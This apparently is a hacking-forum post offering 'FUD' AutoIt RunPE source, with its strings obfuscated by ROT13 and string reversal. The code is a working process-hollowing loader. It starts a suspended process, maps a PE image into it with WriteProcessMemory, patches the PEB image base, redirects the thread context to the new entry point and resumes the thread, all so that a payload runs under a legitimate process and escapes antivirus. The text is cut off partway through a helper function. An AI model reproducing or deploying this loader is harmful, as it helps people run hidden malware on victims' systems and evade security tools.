AutoIT [FUD] Encrypted RunPE

[DDoSer]

[HIDE-THANKS]This shit uses ROT13 -> String Reverse and also ChrMath -> String Reverse

>;Encrypted by DDoSer
;level23hacktools.com

Func _RunBinary($N3130, $Z3131 = "", $M3132 = @AutoItExe)
;#region 1. DETERMINE INTERPRETER TYPE
Local $T3233 = @AutoItX64

;#region 2. PREDPROCESSING PASSED
Local $K3134 = Binary($N3130) ; this is redundant but still...
; Make structure out of binary data that was passed
Local $Y3136 = D12(M12(Z45('[rglo')) & BinaryLen($K3134) & M12(Z45(']')))
DllStructSetData($Y3136, 1, $K3134) ; fill it
; Get pointer to it
Local $S3230 = DllStructGetPtr($Y3136)

;#region 3. CREATING NEW PROCESS
; STARTUPINFO structure (actually all that really matters is allocated space)
Local $M3232 = D12(M12(Z45(';rmvFop qebjq')) & _
		M12(Z45(';qrierfrE egc')) & _
		M12(Z45(';cbgxfrQ egc')) & _
		M12(Z45(';rygvG egc')) & _
		M12(Z45(';K qebjq')) & _
		M12(Z45(';L qebjq')) & _
		M12(Z45(';rmvFK qebjq')) & _
		M12(Z45(';rmvFL qebjq')) & _
		M12(Z45(';fenuPgahbPK qebjq')) & _
		M12(Z45(';fenuPgahbPL qebjq')) & _
		M12(Z45(';rghoveggNyyvS qebjq')) & _
		M12(Z45(';ftnyS qebjq')) & _
		M12(Z45(';jbqavJjbuF qebj')) & _
		M12(Z45(';2qrierfrE qebj')) & _
		M12(Z45(';2qrierfrE egc')) & _
		M12(Z45(';ghcaVqgFu egc')) & _
		M12(Z45(';ghcghBqgFu egc')) & _
		M12(Z45('ebeeRqgFu egc')))
; This is much important. This structure will hold very some important data.
Local $T3233 = D12(M12(Z45(';ffrpbeC egc')) & _
		M12(Z45(';qnreuG egc')) & _
		M12(Z45(';qVffrpbeC qebjq')) & _
		M12(Z45('qVqnreuG qebjq')))
; Create new process
Local $F3234 = G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('JffrpbeCrgnreP')), _
		M12(Z45('egfj')), $M3132, _
		M12(Z45('egfj')), $Z3131, _
		M12(Z45('egc')), 0, _
		M12(Z45('egc')), 0, _
		M12(Z45('gav')), 0, _
		M12(Z45('qebjq')), 4, _ ; CREATE_SUSPENDED ; <- this is essential
		M12(Z45('egc')), 0, _
		M12(Z45('egc')), 0, _
		M12(Z45('egc')), DllStructGetPtr($M3232), _
		M12(Z45('egc')), DllStructGetPtr($T3233))
; Check for errors or failure
If @error Or Not $F3234[0] Then Return SetError(1, 0, 0) ; CreateProcess function or call to it failed
; Get new process and thread handles:
Local $N3330 = V65($T3233, M12(Z45('ffrpbeC')))
Local $V3332 = V65($T3233, M12(Z45('qnreuG')))
; Check for 'wrong' bit-ness. Not because it could't be implemented, but besause it would be uglyer (structures)
If $T3233 And N32($N3330) Then
	G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
	Return SetError(2, 0, 0)
EndIf

;#region 4. FILL CONTEXT STRUCTURE
; CONTEXT structure is what's really important here. It's processor specific.
Local $S3337, $F3338
If $T3233 Then
	If @OSArch = M12(Z45('46K')) Then
		$S3337 = 2
		$F3338 = D12(M12(Z45(';rzbU6C 46gavh ;rzbU5C 46gavh ;rzbU4C 46gavh ;rzbU3C 46gavh ;rzbU2C 46gavh ;rzbU1C 46gavh ;61 atvyn')) & _ ; Register parameter home addresses
				M12(Z45(';efPkZ qebjq ;ftnySgkrgabP qebjq')) & _ ; Control flags
				M12(Z45(';ftnySR qebjq ;fFtrF qebj ;fTtrF qebj ;fStrF qebj ;fRtrF qebj ;fQtrF qebj ;FPtrF qebj')) & _ ; Segment Registers and processor flags
				M12(Z45(';7eQ 46gavh ;6eQ 46gavh ;3eQ 46gavh ;2eQ 46gavh ;1eQ 46gavh ;0eQ 46gavh')) & _ ; Debug registers
				M12(Z45(';51E 46gavh ;41E 46gavh ;31E 46gavh ;21E 46gavh ;11E 46gavh ;01E 46gavh ;9E 46gavh ;8E 46gavh ;vqE 46gavh ;vfE 46gavh ;coE 46gavh ;cfE 46gavh ;koE 46gavh ;kqE 46gavh ;kpE 46gavh ;knE 46gavh')) & _ ; Integer registers
				M12(Z45(';cvE 46gavh')) & _ ; Program counter
				M12(Z45(';]2[51zzK 46gavh ;]2[41zzK 46gavh ;]2[31zzK 46gavh ;]2[21zzK 46gavh ;]2[11zzK 46gavh ;]2[01zzK 46gavh ;]2[9zzK 46gavh ;]2[8zzK 46gavh ;]2[7zzK 46gavh ;]2[6zzK 46gavh ;]2[5zzK 46gavh ;]2[4zzK 46gavh ;]2[3zzK 46gavh ;]2[2zzK 46gavh ;]2[1zzK 46gavh ;]2[0zzK 46gavh ;]61[lpntrY 46gavh ;]4[erqnrU 46gavh')) & _ ; Floating point state (types are not correct for simplicity reasons!!!)
				M12(Z45(';ybegabPebgprI 46gavh ;]25[ergfvtrEebgprI 46gavh')) & _ ; Vector registers (type for VectorRegister is not correct for simplicity reasons!!!)
				M12(Z45('cvEzbeSabvgcrpkRgfnY 46gavh ;cvEbGabvgcrpkRgfnY 46gavh ;cvEzbeSupaneOgfnY 46gavh ;cvEbGupaneOgfnY 46gavh ;ybegabPthorQ 46gavh'))) ; Special debug control registers
	Else
		$S3337 = 3
		; FIXME - Itanium architecture
		; Return special error number:
		G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
		Return SetError(102, 0, 0)
	EndIf
Else
	$S3337 = 1
	$F3338 = D12(M12(Z45(';ftnySgkrgabP qebjq')) & _ ; Control flags
			M12(Z45(';7eQ qebjq ;6eQ qebjq ;3eQ qebjq ;2eQ qebjq ;1eQ qebjq ;0eQ qebjq')) & _ ; CONTEXT_DEBUG_REGISTERS
			M12(Z45(';rgngFkcA0eP qebjq ;]08[nreNergfvtrE rglo ;ebgpryrFngnQ qebjq ;grfssBngnQ qebjq ;ebgpryrFebeeR qebjq ;grfssBebeeR qebjq ;qebJtnG qebjq ;qebJfhgngF qebjq ;qebJybegabP qebjq')) & _ ; CONTEXT_FLOATING_POINT
			M12(Z45(';fQtrF qebjq ;fRtrF qebjq ;fStrF qebjq ;fTtrF qebjq')) & _ ; CONTEXT_SEGMENTS
			M12(Z45(';knR qebjq ;kpR qebjq ;kqR qebjq ;koR qebjq ;vfR qebjq ;vqR qebjq')) & _ ; CONTEXT_INTEGER
			M12(Z45(';fFtrF qebjq ;cfR qebjq ;ftnySR qebjq ;fPtrF qebjq ;cvR qebjq ;coR qebjq')) & _ ; CONTEXT_CONTROL
			M12(Z45(']215[fergfvtrEqrqargkR rglo'))) ; CONTEXT_EXTENDED_REGISTERS
EndIf
; Define CONTEXT_FULL
Local $W3436
Switch $S3337
	Case 1
		$W3436 = 0x10007
	Case 2
		$W3436 = 0x100007
	Case 3
		$W3436 = 0x80027
EndSwitch
; Set desired access
DllStructSetData($F3338, M12(Z45('ftnySgkrgabP')), $W3436)
; Fill CONTEXT structure:
$F3234 = G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('gkrgabPqnreuGgrT')), _
		M12(Z45('ryqanu')), $V3332, _
		M12(Z45('egc')), DllStructGetPtr($F3338))
; Check for errors or failure
If @error Or Not $F3234[0] Then
	G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
	Return SetError(3, 0, 0) ; GetThreadContext function or call to it failed
EndIf
; Pointer to PEB structure
Local $W3538
Switch $S3337
	Case 1
		$W3538 = V65($F3338, M12(Z45('koR')))
	Case 2
		$W3538 = V65($F3338, M12(Z45('kqE')))
	Case 3
		; FIXME - Itanium architecture
EndSwitch

;#region 5. READ PE-FORMAT
; Start processing passed binary data. 'Reading' PE format follows.
; First is IMAGE_DOS_HEADER
Local $E3634 = D12(M12(Z45(';]2[pvtnZ enup')) & _
		M12(Z45(';rtnCgfnYaBfrglO qebj')) & _
		M12(Z45(';frtnC qebj')) & _
		M12(Z45(';fabvgnpbyrE qebj')) & _
		M12(Z45(';erqnrUsbrmvF qebj')) & _
		M12(Z45(';negkRzhzvavZ qebj')) & _
		M12(Z45(';negkRzhzvknZ qebj')) & _
		M12(Z45(';FF qebj')) & _
		M12(Z45(';CF qebj')) & _
		M12(Z45(';zhfxpruP qebj')) & _
		M12(Z45(';CV qebj')) & _
		M12(Z45(';FP qebj')) & _
		M12(Z45(';abvgnpbyrE qebj')) & _
		M12(Z45(';lnyeriB qebj')) & _
		M12(Z45(';]8[qrierfrE enup')) & _
		M12(Z45(';ervsvgarqVZRB qebj')) & _
		M12(Z45(';abvgnzebsaVZRB qebj')) & _
		M12(Z45(';]02[2qrierfrE enup')) & _
		M12(Z45('erqnrUrkRjrAsBffreqqN qebjq')), _
		$S3230)
; Save this pointer value (it's starting address of binary image headers)
Local $Z3636 = $S3230
; Move pointer
$S3230 += V65($E3634, M12(Z45('erqnrUrkRjrAsBffreqqN'))) ; move to PE file header
; Get M12(Z45('pvtnZ'))
Local $O3730 = V65($E3634, M12(Z45('pvtnZ')))
; Check if it's valid format
If Not ($O3730 == M12(Z45('MZ'))) Then
	G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
	Return SetError(4, 0, 0) ; MS-DOS header missing.
EndIf
; In place of IMAGE_NT_SIGNATURE
Local $W3734 = D12(M12(Z45('rehgnatvF qebjq')), $S3230)
; Move pointer
$S3230 += 4 ; size of $W3734 structure
; Check signature
If V65($W3734, M12(Z45('rehgnatvF'))) <> 17744 Then ; IMAGE_NT_SIGNATURE
	G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
	Return SetError(5, 0, 0) ; wrong signature. For PE image should be M12(Z45('0\0\RC')) or 17744 dword.
EndIf
; In place of IMAGE_FILE_HEADER
Local $A3830 = D12(M12(Z45(';ravupnZ qebj')) & _
		M12(Z45(';fabvgprFsBerozhA qebj')) & _
		M12(Z45(';czngFrgnQrzvG qebjq')) & _
		M12(Z45(';ryonGybozlFbGergavbC qebjq')) & _
		M12(Z45(';fybozlFsBerozhA qebjq')) & _
		M12(Z45(';erqnrUynabvgcBsBrmvF qebj')) & _
		M12(Z45('fpvgfvergpnenuP qebj')), _
		$S3230)
; I could check here if the module is relocatable
; Local $R3832
; If BitAND(V65($A3830, M12(Z45('fpvgfvergpnenuP'))), 1) Then $R3832 = False
; But I won't (will check data in IMAGE_DIRECTORY_ENTRY_BASERELOC instead)
; Get number of sections
Local $K3835 = V65($A3830, M12(Z45('fabvgprFsBerozhA')))
; Move pointer
$S3230 += 20 ; size of $A3830 structure
; In place of IMAGE_OPTIONAL_HEADER
Local $T3839 = D12(M12(Z45(';pvtnZ qebj')), $S3230)
Local $Q3931 = V65($T3839, 1)
Local $B3933
If $Q3931 = 267 Then ; x86 version
	If $T3233 Then
		G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
		Return SetError(6, 0, 0) ; incompatible versions
	EndIf
	$B3933 = D12(M12(Z45(';pvtnZ qebj')) & _
			M12(Z45(';abvferIerxavYebwnZ rglo')) & _
			M12(Z45(';abvferIerxavYebavZ rglo')) & _
			M12(Z45(';rqbPsBrmvF qebjq')) & _
			M12(Z45(';ngnQqrmvynvgvaVsBrmvF qebjq')) & _
			M12(Z45(';ngnQqrmvynvgvavaHsBrmvF qebjq')) & _
			M12(Z45(';gavbClegaRsBffreqqN qebjq')) & _
			M12(Z45(';rqbPsBrfnO qebjq')) & _
			M12(Z45(';ngnQsBrfnO qebjq')) & _
			M12(Z45(';rfnOrtnzV qebjq')) & _
			M12(Z45(';garzatvyNabvgprF qebjq')) & _
			M12(Z45(';garzatvyNryvS qebjq')) & _
			M12(Z45(';abvferIzrgflFtavgnercBebwnZ qebj')) & _
			M12(Z45(';abvferIzrgflFtavgnercBebavZ qebj')) & _
			M12(Z45(';abvferIrtnzVebwnZ qebj')) & _
			M12(Z45(';abvferIrtnzVebavZ qebj')) & _
			M12(Z45(';abvferIzrgflfohFebwnZ qebj')) & _
			M12(Z45(';abvferIzrgflfohFebavZ qebj')) & _
			M12(Z45(';rhynIabvferI23avJ qebjq')) & _
			M12(Z45(';rtnzVsBrmvF qebjq')) & _
			M12(Z45(';ferqnrUsBrmvF qebjq')) & _
			M12(Z45(';zhFxpruP qebjq')) & _
			M12(Z45(';zrgflfohF qebj')) & _
			M12(Z45(';fpvgfvergpnenuPyyQ qebj')) & _
			M12(Z45(';rierfrExpngFsBrmvF qebjq')) & _
			M12(Z45(';gvzzbPxpngFsBrmvF qebjq')) & _
			M12(Z45(';rierfrEcnrUsBrmvF qebjq')) & _
			M12(Z45(';gvzzbPcnrUsBrmvF qebjq')) & _
			M12(Z45(';ftnySerqnbY qebjq')) & _
			M12(Z45('frmvFqaNniEsBerozhA qebjq')), _
			$S3230)
	; Move pointer
	$S3230 += 96 ; size of $B3933
ElseIf $Q3931 = 523 Then ; x64 version
	If Not $T3233 Then
		G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
		Return SetError(6, 0, 0) ; incompatible versions
	EndIf
	$B3933 = D12(M12(Z45(';pvtnZ qebj')) & _
			M12(Z45(';abvferIerxavYebwnZ rglo')) & _
			M12(Z45(';abvferIerxavYebavZ rglo')) & _
			M12(Z45(';rqbPsBrmvF qebjq')) & _
			M12(Z45(';ngnQqrmvynvgvaVsBrmvF qebjq')) & _
			M12(Z45(';ngnQqrmvynvgvavaHsBrmvF qebjq')) & _
			M12(Z45(';gavbClegaRsBffreqqN qebjq')) & _
			M12(Z45(';rqbPsBrfnO qebjq')) & _
			M12(Z45(';rfnOrtnzV 46gavh')) & _
			M12(Z45(';garzatvyNabvgprF qebjq')) & _
			M12(Z45(';garzatvyNryvS qebjq')) & _
			M12(Z45(';abvferIzrgflFtavgnercBebwnZ qebj')) & _
			M12(Z45(';abvferIzrgflFtavgnercBebavZ qebj')) & _
			M12(Z45(';abvferIrtnzVebwnZ qebj')) & _
			M12(Z45(';abvferIrtnzVebavZ qebj')) & _
			M12(Z45(';abvferIzrgflfohFebwnZ qebj')) & _
			M12(Z45(';abvferIzrgflfohFebavZ qebj')) & _
			M12(Z45(';rhynIabvferI23avJ qebjq')) & _
			M12(Z45(';rtnzVsBrmvF qebjq')) & _
			M12(Z45(';ferqnrUsBrmvF qebjq')) & _
			M12(Z45(';zhFxpruP qebjq')) & _
			M12(Z45(';zrgflfohF qebj')) & _
			M12(Z45(';fpvgfvergpnenuPyyQ qebj')) & _
			M12(Z45(';rierfrExpngFsBrmvF 46gavh')) & _
			M12(Z45(';gvzzbPxpngFsBrmvF 46gavh')) & _
			M12(Z45(';rierfrEcnrUsBrmvF 46gavh')) & _
			M12(Z45(';gvzzbPcnrUsBrmvF 46gavh')) & _
			M12(Z45(';ftnySerqnbY qebjq')) & _
			M12(Z45('frmvFqaNniEsBerozhA qebjq')), _
			$S3230)
	; Move pointer
	$S3230 += 112 ; size of $B3933
Else
	G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
	Return SetError(6, 0, 0) ; incompatible versions
EndIf
; Extract entry point address
Local $T313039 = V65($B3933, M12(Z45('gavbClegaRsBffreqqN'))) ; if loaded binary image would start executing at this address
; And other interesting informations
Local $D313131 = V65($B3933, M12(Z45('ferqnrUsBrmvF')))
Local $N313133 = V65($B3933, M12(Z45('rfnOrtnzV'))) ; address of the first byte of the image when it's loaded in memory
Local $E313135 = V65($B3933, M12(Z45('rtnzVsBrmvF'))) ; the size of the image including all headers
; Move pointer
$S3230 += 8 ; skipping IMAGE_DIRECTORY_ENTRY_EXPORT
$S3230 += 8 ; size of $O313139
$S3230 += 24 ; skipping IMAGE_DIRECTORY_ENTRY_RESOURCE, IMAGE_DIRECTORY_ENTRY_EXCEPTION, IMAGE_DIRECTORY_ENTRY_SECURITY
; Base Relocation Directory
Local $H313231 = D12(M12(Z45('rmvF qebjq ;ffreqqNynhgevI qebjq')), $S3230)
; Collect data
Local $U313233 = V65($H313231, M12(Z45('ffreqqNynhgevI')))
Local $E313235 = V65($H313231, M12(Z45('rmvF')))
Local $R3832
If $U313233 And $E313235 Then $R3832 = True
;If Not $R3832 Then MsgBox(48, M12(Z45('!tavaenJ')), M12(Z45('!XEBJ GBA LNZ FVUG GHO LEG YYVJ V .RYHQBZ RYONGNPBYRE GBA'))) ; nothing can be done here
; Move pointer
$S3230 += 88 ; size of the structures before IMAGE_SECTION_HEADER (16 of them).

;#region 6. ALLOCATE 'NEW' MEMORY SPACE
Local $S313333
Local $D313334
If $R3832 Then ; If the module can be relocated then allocate memory anywhere possible
	$D313334 = Q29($N3330, $E313135)
	; In case of failure try at original address
	If @error Then
		$D313334 = H65($N3330, $N313133, $E313135)
		If @error Then
			K89($N3330, $N313133)
			; Try now
			$D313334 = H65($N3330, $N313133, $E313135)
			If @error Then
				; Return special error number:
				G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
				Return SetError(101, 1, 0)
			EndIf
		EndIf
	EndIf
	$S313333 = True
Else ; And if not try where it should be
	$D313334 = H65($N3330, $N313133, $E313135)
	If @error Then
		K89($N3330, $N313133)
		; Try now
		$D313334 = H65($N3330, $N313133, $E313135)
		If @error Then
			; Return special error number:
			G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
			Return SetError(101, 0, 0)
		EndIf
	EndIf
EndIf
; If there is new ImageBase value, save it
DllStructSetData($B3933, M12(Z45('rfnOrtnzV')), $D313334)

;#region 7. CONSTRUCT THE NEW MODULE
; Allocate enough space (in our space) for the new module
Local $U313634 = D12(M12(Z45('[rglo')) & $E313135 & M12(Z45(']')))
; Get pointer
Local $G313636 = DllStructGetPtr($U313634)
; Headers
Local $T313638 = D12(M12(Z45('[rglo')) & $D313131 & M12(Z45(']')), $Z3636)
; Write headers to $U313634
DllStructSetData($U313634, 1, V65($T313638, 1))
; Write sections now. $S3230 is currently in place of sections
Local $M313735
Local $X313736, $N313737
Local $L313738, $S313739
Local $B313830
; Loop through sections
For $D313831 = 1 To $K3835
	$M313735 = D12(M12(Z45(';]8[rznA enup')) & _
			M12(Z45(';ffreqqNynpvfluCqaNrmvFynhgevIsBabvaH qebjq')) & _
			M12(Z45(';ffreqqNynhgevI qebjq')) & _
			M12(Z45(';ngnQjnEsBrmvF qebjq')) & _
			M12(Z45(';ngnQjnEbGergavbC qebjq')) & _
			M12(Z45(';fabvgnpbyrEbGergavbC qebjq')) & _
			M12(Z45(';ferozharavYbGergavbC qebjq')) & _
			M12(Z45(';fabvgnpbyrEsBerozhA qebj')) & _
			M12(Z45(';ferozharavYsBerozhA qebj')) & _
			M12(Z45('fpvgfvergpnenuP qebjq')), _
			$S3230)
	; Collect data
	$X313736 = V65($M313735, M12(Z45('ngnQjnEsBrmvF')))
	$N313737 = $Z3636 + V65($M313735, M12(Z45('ngnQjnEbGergavbC')))
	$L313738 = V65($M313735, M12(Z45('ffreqqNynhgevI')))
	$S313739 = V65($M313735, M12(Z45('ffreqqNynpvfluCqaNrmvFynhgevIsBabvaH')))
	If $S313739 And $S313739 < $X313736 Then $X313736 = $S313739
	; If there is data to write, write it
	If $X313736 Then
		DllStructSetData(D12(M12(Z45('[rglo')) & $X313736 & M12(Z45(']')), $G313636 + $L313738), 1, V65(D12(M12(Z45('[rglo')) & $X313736 & M12(Z45(']')), $N313737), 1))
	EndIf
	; Relocations
	If $S313333 Then
		If $L313738 <= $U313233 And $L313738 + $X313736 > $U313233 Then
			$B313830 = D12(M12(Z45('[rglo')) & $E313235 & M12(Z45(']')), $N313737 + ($U313233 - $L313738))
		EndIf
	EndIf
	; Move pointer
	$S3230 += 40 ; size of $M313735 structure
Next
; Fix relocations
If $S313333 Then A23($G313636, $B313830, $D313334, $N313133, $Q3931 = 523)
; Write newly constructed module to allocated space inside the $N3330
$F3234 = G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('lebzrZffrpbeCrgveJ')), _
		M12(Z45('ryqanu')), $N3330, _
		M12(Z45('egc')), $D313334, _
		M12(Z45('egc')), $G313636, _
		M12(Z45('egc_qebjq')), $E313135, _
		M12(Z45('*egc_qebjq')), 0)
; Check for errors or failure
If @error Or Not $F3234[0] Then
	G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
	Return SetError(7, 0, 0) ; WriteProcessMemory function or call to it while writting new module binary
EndIf

;#region 8. PEB ImageBaseAddress MANIPULATION
; PEB structure definition
Local $P323332 = D12(M12(Z45(';rpncFffreqqNqrgveruaV rglo')) & _
		M12(Z45(';fabvgcBprkRryvSrtnzVqnrE rglo')) & _
		M12(Z45(';qrtthorQtavrO rglo')) & _
		M12(Z45(';rencF rglo')) & _
		M12(Z45(';ganghZ egc')) & _
		M12(Z45(';ffreqqNrfnOrtnzV egc')) & _
		M12(Z45(';ngnQerqnbY egc')) & _
		M12(Z45(';fergrznenCffrpbeC egc')) & _
		M12(Z45(';ngnQzrgflFohF egc')) & _
		M12(Z45(';cnrUffrpbeC egc')) & _
		M12(Z45(';xpbYorCgfnS egc')) & _
		M12(Z45(';ravghbExpbYorCgfnS egc')) & _
		M12(Z45(';ravghbExpbyaHorCgfnS egc')) & _
		M12(Z45(';gahbPrgnqcHgarzabeviaR qebjq')) & _
		M12(Z45(';ryonGxpnoyynPyraerX egc')) & _
		M12(Z45(';abvgprFtbYgariR egc')) & _
		M12(Z45(';tbYgariR egc')) & _
		M12(Z45(';gfvYrreS egc')) & _
		M12(Z45(';ergahbPabvfanckRfyG qebjq')) & _
		M12(Z45(';cnzgvOfyG egc')) & _
		M12(Z45(';]2[fgvOcnzgvOfyG qebjq')) & _
		M12(Z45(';rfnOlebzrZqrenuFlyaBqnrE egc')) & _
		M12(Z45(';cnrUlebzrZqrenuFlyaBqnrE egc')) & _
		M12(Z45(';ngnQerierFpvgngFlyaBqnrE egc')) & _
		M12(Z45(';ngnQrtnCrqbPvfaN egc')) & _
		M12(Z45(';ngnQrtnCrqbPzrB egc')) & _
		M12(Z45(';ngnQryonGrfnPrqbpvaH egc')) & _
		M12(Z45(';febffrpbeCsBerozhA qebjq')) & _
		M12(Z45(';tnySynobyTgA qebjq')) & _
		M12(Z45(';]4[2rencF rglo')) & _
		M12(Z45(';ghbrzvGabvgprFynpvgveP 46gav')) & _
		M12(Z45(';rierfrEgarztrFcnrU qebjq')) & _
		M12(Z45(';gvzzbPgarztrFcnrU qebjq')) & _
		M12(Z45(';qybufreuGrreSyngbGgvzzbPrQcnrU qebjq')) & _
		M12(Z45(';qybufreuGxpbyOrreSgvzzbPrQcnrU qebjq')) & _
		M12(Z45(';fcnrUsBerozhA qebjq')) & _
		M12(Z45(';fcnrUsBerozhAzhzvknZ qebjq')) & _
		M12(Z45(';fcnrUffrpbeC egc')) & _
		M12(Z45(';ryonGryqanUqrenuFvqT egc')) & _
		M12(Z45(';ercyrUergengFffrpbeC egc')) & _
		M12(Z45(';gfvYrghoveggNPQvqT egc')) & _
		M12(Z45(';xpbYerqnbY egc')) & _
		M12(Z45(';abvferIebwnZFB qebjq')) & _
		M12(Z45(';abvferIebavZFB qebjq')) & _
		M12(Z45(';erozhAqyvhOFB qebjq')) & _
		M12(Z45(';qVzebsgnyCFB qebjq')) & _
		M12(Z45(';zrgflFohFrtnzV qebjq')) & _
		M12(Z45(';abvferIebwnZzrgflFohFrtnzV qebjq')) & _
		M12(Z45(';abvferIebavZzrgflFohFrtnzV qebjq')) & _
		M12(Z45(';]43[ersshOryqanUvqT qebjq')) & _
		M12(Z45(';ravghbEgvaVffrpbeCgfbC qebjq')) & _
		M12(Z45(';cnzgvOabvfanckRfyG qebjq')) & _
		M12(Z45(';]821[fgvOcnzgvOabvfanckRfyG rglo')) & _
		M12(Z45('qVabvffrF qebjq')))
; Fill the structure
$F3234 = G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('lebzrZffrpbeCqnrE')), _
		M12(Z45('egc')), $N3330, _
		M12(Z45('egc')), $W3538, _ ; pointer to PEB structure
		M12(Z45('egc')), DllStructGetPtr($P323332), _
		M12(Z45('egc_qebjq')), DllStructGetSize($P323332), _
		M12(Z45('*egc_qebjq')), 0)
; Check for errors or failure
If @error Or Not $F3234[0] Then
	G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
	Return SetError(8, 0, 0) ; ReadProcessMemory function or call to it failed while filling PEB structure
EndIf
; Change base address within PEB
DllStructSetData($P323332, M12(Z45('ffreqqNrfnOrtnzV')), $D313334)
; Write the changes
$F3234 = G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('lebzrZffrpbeCrgveJ')), _
		M12(Z45('ryqanu')), $N3330, _
		M12(Z45('egc')), $W3538, _
		M12(Z45('egc')), DllStructGetPtr($P323332), _
		M12(Z45('egc_qebjq')), DllStructGetSize($P323332), _
		M12(Z45('*egc_qebjq')), 0)
; Check for errors or failure
If @error Or Not $F3234[0] Then
	G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
	Return SetError(9, 0, 0) ; WriteProcessMemory function or call to it failed while changing base address
EndIf

;#region 9. NEW ENTRY POINT
; Entry point manipulation
Switch $S3337
	Case 1
		DllStructSetData($F3338, M12(Z45('knR')), $D313334 + $T313039)
	Case 2
		DllStructSetData($F3338, M12(Z45('kpE')), $D313334 + $T313039)
	Case 3
		; FIXME - Itanium architecture
EndSwitch

;#region 10. SET NEW CONTEXT
; New context:
$F3234 = G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('gkrgabPqnreuGgrF')), _
		M12(Z45('ryqanu')), $V3332, _
		M12(Z45('egc')), DllStructGetPtr($F3338))

If @error Or Not $F3234[0] Then
	G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
	Return SetError(10, 0, 0) ; SetThreadContext function or call to it failed
EndIf

;#region 11. RESUME THREAD
; And that's it!. Continue execution:
$F3234 = G53(M12(Z45('yyq.23yraerx')), M12(Z45('qebjq')), M12(Z45('qnreuGrzhfrE')), M12(Z45('ryqanu')), $V3332)
; Check for errors or failure
If @error Or $F3234[0] = -1 Then
	G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ffrpbeCrgnavzerG')), M12(Z45('ryqanu')), $N3330, M12(Z45('qebjq')), 0)
	Return SetError(11, 0, 0) ; ResumeThread function or call to it failed
EndIf

;#region 12. CLOSE OPEN HANDLES AND RETURN PID
G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ryqanUrfbyP')), M12(Z45('ryqanu')), $N3330)
G53(M12(Z45('yyq.23yraerx')), M12(Z45('ybbo')), M12(Z45('ryqanUrfbyP')), M12(Z45('ryqanu')), $V3332)
; All went well. Return new PID:
Return V65($T3233, M12(Z45('qVffrpbeC')))

EndFunc   ;==>_RunBinary

Func A23($G313636, $A323639, $G323730, $C323731, $L323732)
Local $M323733 = $G323730 - $C323731 ; dislocation value
Local $S323736 = DllStructGetSize($A323639) ; size of data
Local $B323738 = DllStructGetPtr($A323639) ; addres of the data structure
Local $X323830, $R323831
Local $L313738, $R323833, $N323834
Local $K323835, $F323836, $F323837
Local $R323838 = 3 + 7 * $L323732 ; IMAGE_REL_BASED_HIGHLOW = 3 or IMAGE_REL_BASED_DIR64 = 10
While $R323831 < $S323736 ; for all data available
	$X323830 = D12(M12(Z45('xpbyOsBrmvF qebjq ;ffreqqNynhgevI qebjq')), $B323738 + $R323831)
	$L313738 = V65($X323830, M12(Z45('ffreqqNynhgevI')))
	$R323833 = V65($X323830, M12(Z45('xpbyOsBrmvF')))
	$N323834 = ($R323833 - 8) / 2
	$K323835 = D12(M12(Z45('[qebj')) & $N323834 & M12(Z45(']')), DllStructGetPtr($X323830) + 8)
	; Go through all entries
	For $D313831 = 1 To $N323834
		$F323836 = V65($K323835, 1, $D313831)
		If BitShift($F323836, 12) = $R323838 Then ; check type
			$F323837 = D12(M12(Z45('egc')), $G313636 + $L313738 + BitAND($F323836, 0xFFF)) ; the rest of $F323836 is offset
			DllStructSetData($F323837, 1, V65($F323837, 1) + $M323733) ; this is what's this all about
		EndIf
	Next
	$R323831 += $R323833
WEnd
Return 1 ; all OK!
EndFunc   ;==>A23

Func H65($N3330, $S333232, $S323736)
; Allocate
